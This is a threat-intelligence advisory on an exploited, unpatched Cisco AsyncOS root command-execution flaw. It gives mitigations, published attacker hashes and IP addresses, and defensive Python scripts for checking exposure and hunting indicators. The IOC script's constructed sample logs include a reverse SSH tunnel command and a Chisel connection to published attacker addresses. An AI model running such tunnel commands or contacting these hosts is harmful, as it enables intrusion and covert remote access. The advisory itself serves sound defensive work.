Unpatched Cisco Critical Zero-Day Exploited by Chinese-Nexus Actors

December 19, 2025

This article was authored by Ryan Hicks of Kroll’s Threat Intelligence Team

Key Takeaways

  • Cisco AsyncOS, Secure Email Gateway and Secure Email and Web Manager are affected by a CVSS 10.0 flaw that allows command execution as root.
  • No patch is currently available; appliances are vulnerable only if the Spam Quarantine feature is enabled and reachable from the internet.

Summary

CVE: CVE-2025-20393
CVSS: 10.0 (Critical)
Exploitation Potential: Exploited in the wild
Action: Apply mitigations (no patch available at time of writing)
Products Impacted:

  • Cisco AsyncOS
  • Cisco Secure Email Gateway (Physical and Virtual)
  • Cisco Secure Email and Web Manager (Physical and Virtual)

Advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-attack-N9bf4

Cisco has released an advisory for CVE-2025-20393, which carries a CVSS score of 10.0 (Critical) and can lead to command execution with root privileges. The vulnerability has been exploited in the wild, as described in a recent Cisco Talos report. Cisco assesses the actor to be a Chinese-nexus APT that exploited the vulnerability to deploy AQUASHELL (a Python backdoor), AQUAPURGE (a lightweight utility) and AQUATUNNEL (a ReverseSSH backdoor). The open-source tunneling tool Chisel was also observed in use as a proxy. Cisco notes it has been aware of this activity since at least late November 2025.

Exploitation Requirements

Cisco notes that affected products are exploitable only if both of the following conditions are met:

  • The appliance is configured with the Spam Quarantine feature.
  • The Spam Quarantine feature is exposed to and reachable from the internet.

Mitigations

At the time of writing there is no patch for the vulnerability, so it is imperative to ensure the Spam Quarantine interface is not reachable from the internet, or to disable the feature entirely if it is not required. Verify exposure from an external vantage point rather than relying on firewall or NAT configuration alone, and note that the advisory's condition is reachability: a quarantine interface that is exposed but rarely used is still vulnerable.
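A quick way to confirm the exposure condition from outside the network is to probe the Spam Quarantine listener from an internet-facing host. The script below is an added example written for this article, not Cisco's or Kroll's tooling. It assumes TCP ports 82 (HTTP) and 83 (HTTPS) as the appliance's default Spam Quarantine ports and uses a placeholder hostname; both are assumptions, so confirm the actual ports in your appliance configuration before trusting a negative result. It also validates the probe itself against a local listener first, so that "not reachable" is not just a broken probe.

```python
"""External reachability check for the Spam Quarantine web interface.

Added example for this article, not Cisco's or Kroll's tooling.  Run it from
a host OUTSIDE your network: the advisory's condition is internet
reachability, not whether the feature is in active use.
"""
import socket
import sys

# ASSUMPTION: 82/83 are the appliance's default HTTP/HTTPS Spam Quarantine
# ports.  Verify the real values on your appliance before relying on a miss.
ASSUMED_SPAM_QUARANTINE_PORTS = (82, 83)


def port_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if a TCP connection to host:port completes; False on refusal or timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def exposed_ports(host: str, ports=ASSUMED_SPAM_QUARANTINE_PORTS) -> list:
    """Return the subset of ports on host that accept a connection from here."""
    return [p for p in ports if port_reachable(host, p)]


def probe_selfcheck() -> tuple:
    """Validate the probe against a local listener.

    Returns (reachable_while_listening, reachable_after_close), which should be
    (True, False).  A negative result from exposed_ports() only means something
    if the probe works from the vantage point you are running it on.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    while_open = port_reachable("127.0.0.1", port, timeout=1.0)
    listener.close()
    after_close = port_reachable("127.0.0.1", port, timeout=1.0)
    return while_open, after_close


if __name__ == "__main__":
    assert probe_selfcheck() == (True, False), "probe is not working from this host"
    # ASSUMPTION: placeholder hostname; pass your appliance's public name or IP.
    host = sys.argv[1] if len(sys.argv) > 1 else "esa.example.com"
    open_ports = exposed_ports(host)
    print(f"{host}: Spam Quarantine ports reachable from here: {open_ports or 'none'}")
```

Run it from a cloud VM or other external host, not from inside the corporate network, since an internal route to the appliance says nothing about internet reachability. Any port that shows as reachable should be closed at the perimeter (or the feature disabled) until Cisco ships a fix.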


Indicators of Compromise (IOCs)

The following IOCs have been reported by Cisco and ingested into the Kroll IOC feed for detection on behalf of managed service customers. File indicators are SHA-256 hashes; IP addresses are defanged with "[.]".

AquaTunnel (SHA-256)
2db8ad6e0f43e93cc557fbda0271a436f9f2a478b1607073d4ee3d20a87ae7ef

AquaPurge (SHA-256)
145424de9f7d5dd73b599328ada03aa6d6cdcee8d5fe0f7cb832297183dbe4ca

Chisel (SHA-256, followed by the IP addresses Cisco lists alongside it)
85a0b22bd17f7f87566bd335349ef89e24a5a19f899825b4d178ce6240f58bfc
172[.]233[.]67[.]176
172[.]237[.]29[.]147
38[.]54[.]56[.]95

Recommended Actions

  • Identify whether affected products are in use, checking the exploitation requirements above for each device.
  • If a vulnerable device is in use and the conditions are met, conduct a compromise assessment and hunt for the indicators of compromise listed above.
  • Seek further guidance from Cisco as required via the advisory link above.
  • Patch affected products as soon as a fix becomes available.
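The IOC section and the recommended compromise assessment above both come down to the same two checks: hash files recovered from the appliance (or a mounted image) against the published SHA-256 values, and search connection logs for the published addresses. The script below is an added example for this article, not Cisco's or Kroll's tooling. The hashes and IP addresses are exactly those listed in the IOC section; the sample log lines and the temporary file tree in the demo are constructed for illustration. It refangs the "[.]" notation and validates each address, and matches whole dotted quads so that 38.54.56.95 is not reported inside an unrelated address such as 138.54.56.95.

```python
"""IOC hunt for the CVE-2025-20393 indicators listed in this article.

Added example, not Cisco's or Kroll's tooling.  Hashes and IPs are the ones
published in the IOC section; sample files and log lines are constructed.
"""
import hashlib
import ipaddress
import os
import re
import tempfile

# SHA-256 file hashes from the IOC section, keyed to the tool name Cisco assigned.
FILE_HASHES = {
    "2db8ad6e0f43e93cc557fbda0271a436f9f2a478b1607073d4ee3d20a87ae7ef": "AquaTunnel",
    "145424de9f7d5dd73b599328ada03aa6d6cdcee8d5fe0f7cb832297183dbe4ca": "AquaPurge",
    "85a0b22bd17f7f87566bd335349ef89e24a5a19f899825b4d178ce6240f58bfc": "Chisel",
}

# Network indicators exactly as published (defanged with "[.]").
DEFANGED_IPS = ["172[.]233[.]67[.]176", "172[.]237[.]29[.]147", "38[.]54[.]56[.]95"]


def refang(indicator: str) -> str:
    """Convert a defanged indicator back to a real IPv4 address, failing loudly on typos."""
    ip = indicator.replace("[.]", ".")
    ipaddress.IPv4Address(ip)  # raises ValueError if the indicator was mangled in transit
    return ip


NETWORK_IOCS = frozenset(refang(i) for i in DEFANGED_IPS)

# Whole dotted quad only: "38.54.56.95" must not match inside "138.54.56.95".
IP_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def match_hash(digest: str, hashes=FILE_HASHES):
    """Return the tool name for a known-bad SHA-256 digest (any case), else None."""
    return hashes.get(digest.lower())


def hunt_blobs(blobs: dict, hashes=FILE_HASHES) -> list:
    """Hash in-memory blobs {label: bytes} and return sorted (label, tool) hits."""
    hits = []
    for label, data in blobs.items():
        tool = match_hash(hashlib.sha256(data).hexdigest(), hashes)
        if tool:
            hits.append((label, tool))
    return sorted(hits)


def hunt_files(root: str, hashes=FILE_HASHES) -> list:
    """Walk a directory tree (e.g. a mounted appliance image) and return (path, tool) hits."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as fh:  # stream in 1 MiB chunks; files may be large
                for chunk in iter(lambda: fh.read(1 << 20), b""):
                    h.update(chunk)
            tool = match_hash(h.hexdigest(), hashes)
            if tool:
                hits.append((path, tool))
    return sorted(hits)


def hunt_logs(lines) -> list:
    """Return (line_number, ip) for each line mentioning a published C2/proxy address."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in IP_RE.findall(line):
            if ip in NETWORK_IOCS:
                hits.append((n, ip))
    return hits


# Constructed sample log lines (not real appliance output).  Lines 2, 3 and 5
# contain published addresses; line 4 is a near-miss that must NOT match.
SAMPLE_LOGS = [
    "sshd[1201]: Accepted publickey for admin from 10.0.0.5 port 51022",
    "firewall: OUT=eth0 SRC=192.168.1.20 DST=172.233.67.176 PROTO=TCP DPT=443",
    "proc: chisel client connected to 38.54.56.95:8080",
    "firewall: OUT=eth0 SRC=192.168.1.20 DST=138.54.56.95 PROTO=TCP DPT=443",
    "proc: ssh -R 0.0.0.0:2222 user@172.237.29.147 -p 443",
]

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:  # constructed tree with one benign file
        with open(os.path.join(root, "benign.txt"), "wb") as fh:
            fh.write(b"nothing to see here\n")
        print("file hits:", hunt_files(root))  # empty unless a real sample is present
    print("log hits:", hunt_logs(SAMPLE_LOGS))
```

Point hunt_files at a copy of the appliance filesystem rather than the live appliance where possible, and feed hunt_logs with perimeter firewall, proxy and NetFlow exports as well as appliance logs, since the published addresses were used for tunnelling and proxying, which is most visible at the egress point.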

Get in touch with Kroll’s CTI Team for further frontline information and explore how our team can help you stay ahead of today’s threats.
